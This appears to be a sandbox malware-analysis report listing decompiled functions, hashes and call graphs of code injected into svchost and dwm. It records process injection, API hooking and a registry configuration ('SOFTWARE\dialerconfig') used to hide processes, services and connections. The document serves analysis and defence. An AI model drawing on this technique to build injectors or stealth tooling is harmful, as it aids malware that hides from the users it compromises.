                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction ID: d9ae04a037fab9593d23b185716cfc6ae1853ea009b9f3fd067145c53b8789b8
                                                                                • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction Fuzzy Hash: 63116A36205F8482EB228F19F450399B7E2FB88B95F584221EE8C57B68DF3CC552CB00
                                                                                Function 00000195DD597356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308832875.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: 9d65062051ba8b6632479c62e9aac4e80b8205db58c6d08c9f87c8cd4192a069
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: E9E08671640F44D4DF028F61E8502D833E1DB58B64F889122995C1A311FA3CD1E9C301
                                                                                Function 00000195DD5973B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308832875.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: 73069449200712f0ed9716194b398ac1fb7d2be99278163e9f3c6fe5041c0d1b
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: 23E08671600F44D4DF028F61E4501D873E1E758B54F889122D94C1A311EA3CD1E5C300
                                                                                Function 00000195DD5C1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction ID: c6ff0b059641438406dd073903249133c4bef50443ea073ae8eca436ca04cd8d
                                                                                • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction Fuzzy Hash: 96115135612F4881EB56DBEAE4146A977E2FB89FC0F184024DE4DA7B65DF38C452D340
                                                                                Function 00000195DD5C1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction ID: 2cb59b5cb5821d9a8e55ce1da8b0343498eb188679990e79d0fc3b99dd601316
                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction Fuzzy Hash: 63E09235601A0886EB058FE2D82838A36E2FB8DF06F04C024C90907751DF7D84DAC760

                                                                                Execution Graph

                                                                                Execution Coverage:1.7%
                                                                                Dynamic/Decrypted Code Coverage:95.6%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:135
                                                                                Total number of Limit Nodes:16
                                                                                execution_graph 14881 1160cbe5cf0 14882 1160cbe5cfd 14881->14882 14883 1160cbe5d09 14882->14883 14892 1160cbe5e1a 14882->14892 14884 1160cbe5d3e 14883->14884 14886 1160cbe5d8d 14883->14886 14885 1160cbe5d66 SetThreadContext 14884->14885 14885->14886 14887 1160cbe5e41 VirtualProtect FlushInstructionCache 14887->14892 14888 1160cbe5efe 14889 1160cbe5f1e 14888->14889 14903 1160cbe43e0 14888->14903 14899 1160cbe4df0 GetCurrentProcess 14889->14899 14891 1160cbe5f23 14894 1160cbe5f77 14891->14894 14895 1160cbe5f37 ResumeThread 14891->14895 14892->14887 14892->14888 14907 1160cbe7940 14894->14907 14896 1160cbe5f6b 14895->14896 14896->14891 14898 1160cbe5fbf 14900 1160cbe4e0c 14899->14900 14901 1160cbe4e22 VirtualProtect FlushInstructionCache 14900->14901 14902 1160cbe4e53 14900->14902 14901->14900 14902->14891 14905 1160cbe43fc 14903->14905 14904 1160cbe445f 14904->14889 14905->14904 14906 1160cbe4412 VirtualFree 14905->14906 14906->14905 14909 1160cbe7949 14907->14909 14908 1160cbe7954 14908->14898 14909->14908 14910 1160cbe812c IsProcessorFeaturePresent 14909->14910 14911 1160cbe8144 14910->14911 14914 1160cbe8320 RtlCaptureContext 14911->14914 14913 1160cbe8157 14913->14898 14915 1160cbe833a RtlLookupFunctionEntry 14914->14915 14916 1160cbe8350 capture_current_context 14915->14916 14917 1160cbe8389 14915->14917 14916->14915 14916->14917 14917->14913 14918 1160cbe1abc 14924 1160cbe1628 GetProcessHeap 14918->14924 14920 1160cbe1ad2 Sleep SleepEx 14922 1160cbe1acb 14920->14922 14922->14920 14923 1160cbe1598 StrCmpIW StrCmpW 14922->14923 14969 1160cbe18b4 14922->14969 14923->14922 14925 1160cbe1648 _invalid_parameter_noinfo 14924->14925 14986 1160cbe1268 GetProcessHeap 14925->14986 14927 1160cbe1650 14928 1160cbe1268 2 API calls 14927->14928 14929 1160cbe1661 14928->14929 14930 1160cbe1268 2 API calls 14929->14930 14931 1160cbe166a 14930->14931 14932 1160cbe1268 2 API calls 14931->14932 14933 1160cbe1673 14932->14933 14934 1160cbe168e RegOpenKeyExW 14933->14934 14935 1160cbe16c0 RegOpenKeyExW 14934->14935 14936 1160cbe18a6 14934->14936 14937 1160cbe16ff RegOpenKeyExW 14935->14937 14938 1160cbe16e9 14935->14938 14936->14922 14940 1160cbe1723 14937->14940 14941 1160cbe173a RegOpenKeyExW 14937->14941 14997 1160cbe12bc RegQueryInfoKeyW 14938->14997 14990 1160cbe104c RegQueryInfoKeyW 14940->14990 14944 1160cbe1775 RegOpenKeyExW 14941->14944 14945 1160cbe175e 14941->14945 14942 1160cbe16f5 RegCloseKey 14942->14937 14948 1160cbe17b0 RegOpenKeyExW 14944->14948 14949 1160cbe1799 14944->14949 14947 1160cbe12bc 11 API calls 14945->14947 14952 1160cbe176b RegCloseKey 14947->14952 14950 1160cbe17d4 14948->14950 14951 1160cbe17eb RegOpenKeyExW 14948->14951 14953 1160cbe12bc 11 API calls 14949->14953 14954 1160cbe12bc 11 API calls 14950->14954 14955 1160cbe180f 14951->14955 14956 1160cbe1826 RegOpenKeyExW 14951->14956 14952->14944 14957 1160cbe17a6 RegCloseKey 14953->14957 14958 1160cbe17e1 RegCloseKey 14954->14958 14959 1160cbe104c 4 API calls 14955->14959 14960 1160cbe1861 RegOpenKeyExW 14956->14960 14961 1160cbe184a 14956->14961 14957->14948 14958->14951 14962 1160cbe181c RegCloseKey 14959->14962 14964 1160cbe1885 14960->14964 14965 1160cbe189c RegCloseKey 14960->14965 14963 1160cbe104c 4 API calls 14961->14963 14962->14956 14966 1160cbe1857 RegCloseKey 14963->14966 14967 1160cbe104c 4 API calls 14964->14967 14965->14936 14966->14960 14968 1160cbe1892 RegCloseKey 14967->14968 14968->14965 15014 1160cbe14a4 14969->15014 15008 1160cbf6168 14986->15008 14988 1160cbe1283 GetProcessHeap 14989 1160cbe12ae _invalid_parameter_noinfo 14988->14989 14989->14927 14991 1160cbe11b5 RegCloseKey 14990->14991 14992 1160cbe10bf 14990->14992 14991->14941 14992->14991 14993 1160cbe10cf RegEnumValueW 14992->14993 14994 1160cbe1125 _invalid_parameter_noinfo Concurrency::details::SchedulerProxy::DeleteThis 14993->14994 14994->14991 14994->14993 14995 1160cbe114e GetProcessHeap 14994->14995 14996 1160cbe116e GetProcessHeap 14994->14996 14995->14994 14996->14994 14998 1160cbe148a Concurrency::details::SchedulerProxy::DeleteThis 14997->14998 14999 1160cbe1327 GetProcessHeap 14997->14999 14998->14942 15005 1160cbe133e _invalid_parameter_noinfo Concurrency::details::SchedulerProxy::DeleteThis 14999->15005 15000 1160cbe1352 RegEnumValueW 15000->15005 15001 1160cbe1476 GetProcessHeap 15001->14998 15003 1160cbe13d3 GetProcessHeap 15003->15005 15004 1160cbe141e lstrlenW GetProcessHeap 15004->15005 15005->15000 15005->15001 15005->15003 15005->15004 15006 1160cbe1443 StrCpyW 15005->15006 15007 1160cbe13f3 GetProcessHeap 15005->15007 15009 1160cbe152c 15005->15009 15006->15005 15007->15005 15010 1160cbe157c 15009->15010 15011 1160cbe1546 15009->15011 15010->15005 15011->15010 15012 1160cbe1565 StrCmpW 15011->15012 15013 1160cbe155d StrCmpIW 15011->15013 15012->15011 15013->15011 15015 1160cbe14e1 GetProcessHeap 15014->15015 15016 1160cbe14c1 GetProcessHeap 15014->15016 15020 1160cbf6180 15015->15020 15017 1160cbe14da Concurrency::details::SchedulerProxy::DeleteThis 15016->15017 15017->15015 15017->15016 15021 1160cbf6182 15020->15021 15022 1160cbe554d 15023 1160cbe5554 15022->15023 15024 1160cbe55bb 15023->15024 15025 1160cbe5637 VirtualProtect 15023->15025 15026 1160cbe5663 GetLastError 15025->15026 15027 1160cbe5671 15025->15027 15026->15027 15028 1160cbe28c8 15030 1160cbe290e 15028->15030 15029 1160cbe2970 15030->15029 15032 1160cbe3844 15030->15032 15033 1160cbe3851 StrCmpNIW 15032->15033 15034 1160cbe3866 15032->15034 15033->15034 15034->15030 15035 1160cbb273c 15036 1160cbb276a 15035->15036 15037 1160cbb27c5 VirtualAlloc 15036->15037 15040 1160cbb28d4 15036->15040 15039 1160cbb27ec 15037->15039 15037->15040 15038 1160cbb2858 LoadLibraryA 15038->15039 15039->15038 15039->15040 15041 1160cbe3ab9 15044 1160cbe3a06 15041->15044 15042 1160cbe3a70 15043 1160cbe3a56 VirtualQuery 15043->15042 15043->15044 15044->15042 15044->15043 15045 1160cbe3a8a VirtualAlloc 15044->15045 15045->15042 15046 1160cbe3abb GetLastError 15045->15046 15046->15044

                                                                                Executed Functions

                                                                                Function 000001160CBE1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction ID: 2969c2283baf436b52471c0dd72c5a34752808bbaf6e92cb8698fb307b17855c
                                                                                • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction Fuzzy Hash: CA71F67A610F1089EB149F79E8906DD2368F788F88F501191AE4E57B6EEF36C445E340
                                                                                Function 000001160CBE3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID: wr
                                                                                • API String ID: 1092925422-2678910430
                                                                                • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction ID: 532fa79624950b1881f1283b20fa38b53297972ce140c533428026739ab091ad
                                                                                • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction Fuzzy Hash: BD112A3A704B4186EB189B25E4046E963B4F748B86F5401A9EF8907768EF2EC545D704
                                                                                Function 000001160CBE5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 59 1160cbe5b30-1160cbe5b57 60 1160cbe5b6b-1160cbe5b76 GetCurrentThreadId 59->60 61 1160cbe5b59-1160cbe5b68 59->61 62 1160cbe5b82-1160cbe5b89 60->62 63 1160cbe5b78-1160cbe5b7d 60->63 61->60 65 1160cbe5b9b-1160cbe5baf 62->65 66 1160cbe5b8b-1160cbe5b96 call 1160cbe5960 62->66 64 1160cbe5faf-1160cbe5fc6 call 1160cbe7940 63->64 69 1160cbe5bbe-1160cbe5bc4 65->69 66->64 72 1160cbe5c95-1160cbe5cb6 69->72 73 1160cbe5bca-1160cbe5bd3 69->73 79 1160cbe5e1f-1160cbe5e30 call 1160cbe74bf 72->79 80 1160cbe5cbc-1160cbe5cdc GetThreadContext 72->80 74 1160cbe5bd5-1160cbe5c18 call 1160cbe85c0 73->74 75 1160cbe5c1a-1160cbe5c8d call 1160cbe4510 call 1160cbe44b0 call 1160cbe4470 73->75 87 1160cbe5c90 74->87 75->87 91 1160cbe5e35-1160cbe5e3b 79->91 84 1160cbe5ce2-1160cbe5d03 80->84 85 1160cbe5e1a 80->85 84->85 90 1160cbe5d09-1160cbe5d12 84->90 85->79 87->69 94 1160cbe5d14-1160cbe5d25 90->94 95 1160cbe5d92-1160cbe5da3 90->95 96 1160cbe5e41-1160cbe5e98 VirtualProtect FlushInstructionCache 91->96 97 1160cbe5efe-1160cbe5f0e 91->97 99 1160cbe5d8d 94->99 100 1160cbe5d27-1160cbe5d3c 94->100 103 1160cbe5e15 95->103 104 1160cbe5da5-1160cbe5dc3 95->104 101 1160cbe5e9a-1160cbe5ea4 96->101 102 1160cbe5ec9-1160cbe5ef9 call 1160cbe78ac 96->102 106 1160cbe5f10-1160cbe5f17 97->106 107 1160cbe5f1e-1160cbe5f2a call 1160cbe4df0 97->107 99->103 100->99 109 1160cbe5d3e-1160cbe5d88 call 1160cbe3970 SetThreadContext 100->109 101->102 110 1160cbe5ea6-1160cbe5ec1 call 1160cbe4390 101->110 102->91 104->103 111 1160cbe5dc5-1160cbe5e10 call 1160cbe3900 call 1160cbe74dd 104->111 106->107 113 1160cbe5f19 call 1160cbe43e0 106->113 120 1160cbe5f2f-1160cbe5f35 107->120 109->99 110->102 111->103 113->107 124 1160cbe5f77-1160cbe5f95 120->124 125 1160cbe5f37-1160cbe5f75 ResumeThread call 1160cbe78ac 120->125 128 1160cbe5fa9 124->128 129 1160cbe5f97-1160cbe5fa6 124->129 125->120 128->64 129->128
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                                                • Instruction ID: 2c08d144f7439132435d16453bda7c7501d22123e30e0c45c2987ea6ccbbd8ff
                                                                                • Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                                                • Instruction Fuzzy Hash: F2D18876208F8881DA749B1AE4943DAB7A0F78CF88F140196EB8D47BA9DF3DC545DB40
                                                                                Function 000001160CBE50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 131 1160cbe50d0-1160cbe50fc 132 1160cbe50fe-1160cbe5106 131->132 133 1160cbe510d-1160cbe5116 131->133 132->133 134 1160cbe5118-1160cbe5120 133->134 135 1160cbe5127-1160cbe5130 133->135 134->135 136 1160cbe5132-1160cbe513a 135->136 137 1160cbe5141-1160cbe514a 135->137 136->137 138 1160cbe514c-1160cbe5151 137->138 139 1160cbe5156-1160cbe5161 GetCurrentThreadId 137->139 140 1160cbe56d3-1160cbe56da 138->140 141 1160cbe5163-1160cbe5168 139->141 142 1160cbe516d-1160cbe5174 139->142 141->140 143 1160cbe5181-1160cbe518a 142->143 144 1160cbe5176-1160cbe517c 142->144 145 1160cbe518c-1160cbe5191 143->145 146 1160cbe5196-1160cbe51a2 143->146 144->140 145->140 147 1160cbe51a4-1160cbe51c9 146->147 148 1160cbe51ce-1160cbe5225 call 1160cbe56e0 * 2 146->148 147->140 153 1160cbe523a-1160cbe5243 148->153 154 1160cbe5227-1160cbe522e 148->154 157 1160cbe5255-1160cbe525e 153->157 158 1160cbe5245-1160cbe5252 153->158 155 1160cbe5230 154->155 156 1160cbe5236 154->156 161 1160cbe52b0-1160cbe52b6 155->161 162 1160cbe52a6-1160cbe52aa 156->162 159 1160cbe5273-1160cbe5298 call 1160cbe7870 157->159 160 1160cbe5260-1160cbe5270 157->160 158->157 170 1160cbe529e 159->170 171 1160cbe532d-1160cbe5342 call 1160cbe3cc0 159->171 160->159 164 1160cbe52e5-1160cbe52eb 161->164 165 1160cbe52b8-1160cbe52d4 call 1160cbe4390 161->165 162->161 168 1160cbe5315-1160cbe5328 164->168 169 1160cbe52ed-1160cbe530c call 1160cbe78ac 164->169 165->164 175 1160cbe52d6-1160cbe52de 165->175 168->140 169->168 170->162 178 1160cbe5344-1160cbe534c 171->178 179 1160cbe5351-1160cbe535a 171->179 175->164 178->162 180 1160cbe536c-1160cbe53ba call 1160cbe8c60 179->180 181 1160cbe535c-1160cbe5369 179->181 184 1160cbe53c2-1160cbe53ca 180->184 181->180 185 1160cbe53d0-1160cbe54bb call 1160cbe7440 184->185 186 1160cbe54d7-1160cbe54df 184->186 198 1160cbe54bf-1160cbe54ce call 1160cbe4060 185->198 199 1160cbe54bd 185->199 187 1160cbe5523-1160cbe552b 186->187 188 1160cbe54e1-1160cbe54f4 call 1160cbe4590 186->188 191 1160cbe552d-1160cbe5535 187->191 192 1160cbe5537-1160cbe5546 187->192 202 1160cbe54f8-1160cbe5521 188->202 203 1160cbe54f6 188->203 191->192 195 1160cbe5554-1160cbe5561 191->195 196 1160cbe554f 192->196 197 1160cbe5548 192->197 200 1160cbe5564-1160cbe55b9 call 1160cbe85c0 195->200 201 1160cbe5563 195->201 196->195 197->196 207 1160cbe54d2 198->207 208 1160cbe54d0 198->208 199->186 210 1160cbe55bb-1160cbe55c3 200->210 211 1160cbe55c8-1160cbe5661 call 1160cbe4510 call 1160cbe4470 VirtualProtect 200->211 201->200 202->186 203->187 207->184 208->186 216 1160cbe5663-1160cbe5668 GetLastError 211->216 217 1160cbe5671-1160cbe56d1 211->217 216->217 217->140
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                                • Instruction ID: f1417c386a04ed11b26314ad22a1bed10d830863f456b4636a77e565cc498eca
                                                                                • Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                                • Instruction Fuzzy Hash: DC02BA72219B8486EB64CB55E49039AB7A0F3C8B94F104195FB8E87BADDF7DC484DB00
                                                                                Function 000001160CBE39E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$AllocQuery
                                                                                • String ID:
                                                                                • API String ID: 31662377-0
                                                                                • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                • Instruction ID: 76c4d106e3fedf68f3b540c6929bc792785fe06e2531eb5b009f972fab3b7692
                                                                                • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                • Instruction Fuzzy Hash: 3E31F032219F9481EA789A15E0553DE66E0F38CB84F5015A5F7CE47BACEF7EC580AB04
                                                                                Function 000001160CBE328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction ID: 2ac1fde5ceca8f5e5ba180acfd043857f4f33f0c7581980f357d40f5372f6f43
                                                                                • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction Fuzzy Hash: 0B118471A14F4086FB6C9721F849BEA22D4AB5CB45F6041E4BB06836BDFF7BC444E600
                                                                                Function 000001160CBE4DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 3733156554-0
                                                                                • Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                                • Instruction ID: 257107c6a131fa6ae524c71ac86d974b387ea6ef410a9d0da3cecff434d44bdf
                                                                                • Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                                • Instruction Fuzzy Hash: A8F0A476218F0480D6289B45E4517DAABA0E38CBD4F145195FA8D47B6DDF3AC6909B40
                                                                                Function 000001160CBB273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 265 1160cbb273c-1160cbb27a4 call 1160cbb29d4 * 4 274 1160cbb29b2 265->274 275 1160cbb27aa-1160cbb27ad 265->275 276 1160cbb29b4-1160cbb29d0 274->276 275->274 277 1160cbb27b3-1160cbb27b6 275->277 277->274 278 1160cbb27bc-1160cbb27bf 277->278 278->274 279 1160cbb27c5-1160cbb27e6 VirtualAlloc 278->279 279->274 280 1160cbb27ec-1160cbb280c 279->280 281 1160cbb280e-1160cbb2836 280->281 282 1160cbb2838-1160cbb283f 280->282 281->281 281->282 283 1160cbb28df-1160cbb28e6 282->283 284 1160cbb2845-1160cbb2852 282->284 286 1160cbb2992-1160cbb29b0 283->286 287 1160cbb28ec-1160cbb2901 283->287 284->283 285 1160cbb2858-1160cbb286a LoadLibraryA 284->285 289 1160cbb286c-1160cbb2878 285->289 290 1160cbb28ca-1160cbb28d2 285->290 286->276 287->286 288 1160cbb2907 287->288 291 1160cbb290d-1160cbb2921 288->291 292 1160cbb28c5-1160cbb28c8 289->292 290->285 293 1160cbb28d4-1160cbb28d9 290->293 295 1160cbb2923-1160cbb2934 291->295 296 1160cbb2982-1160cbb298c 291->296 292->290 297 1160cbb287a-1160cbb287d 292->297 293->283 299 1160cbb293f-1160cbb2943 295->299 300 1160cbb2936-1160cbb293d 295->300 296->286 296->291 301 1160cbb287f-1160cbb28a5 297->301 302 1160cbb28a7-1160cbb28b7 297->302 304 1160cbb2945-1160cbb294b 299->304 305 1160cbb294d-1160cbb2951 299->305 303 1160cbb2970-1160cbb2980 300->303 306 1160cbb28ba-1160cbb28c1 301->306 302->306 303->295 303->296 304->303 307 1160cbb2963-1160cbb2967 305->307 308 1160cbb2953-1160cbb2961 305->308 306->292 307->303 310 1160cbb2969-1160cbb296c 307->310 308->303 310->303
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337600267.000001160CBB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbb0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: AllocLibraryLoadVirtual
                                                                                • String ID:
                                                                                • API String ID: 3550616410-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: 3902f09aa2da9d38923e8f1cf7cc37bf8468d54b6c15079d0d07c7b5da615e92
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: 7661E132B01B9087EB588F1594807EDB3A2FB58BA4F588135EF9D07788DB79D852E701
                                                                                Function 000001160CBE1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 000001160CBE1628: GetProcessHeap.KERNEL32 ref: 000001160CBE1633
                                                                                  • Part of subcall function 000001160CBE1628: HeapAlloc.KERNEL32 ref: 000001160CBE1642
                                                                                  • Part of subcall function 000001160CBE1628: RegOpenKeyExW.ADVAPI32 ref: 000001160CBE16B2
                                                                                  • Part of subcall function 000001160CBE1628: RegOpenKeyExW.ADVAPI32 ref: 000001160CBE16DF
                                                                                  • Part of subcall function 000001160CBE1628: RegCloseKey.ADVAPI32 ref: 000001160CBE16F9
                                                                                  • Part of subcall function 000001160CBE1628: RegOpenKeyExW.ADVAPI32 ref: 000001160CBE1719
                                                                                  • Part of subcall function 000001160CBE1628: RegCloseKey.ADVAPI32 ref: 000001160CBE1734
                                                                                  • Part of subcall function 000001160CBE1628: RegOpenKeyExW.ADVAPI32 ref: 000001160CBE1754
                                                                                  • Part of subcall function 000001160CBE1628: RegCloseKey.ADVAPI32 ref: 000001160CBE176F
                                                                                  • Part of subcall function 000001160CBE1628: RegOpenKeyExW.ADVAPI32 ref: 000001160CBE178F
                                                                                  • Part of subcall function 000001160CBE1628: RegCloseKey.ADVAPI32 ref: 000001160CBE17AA
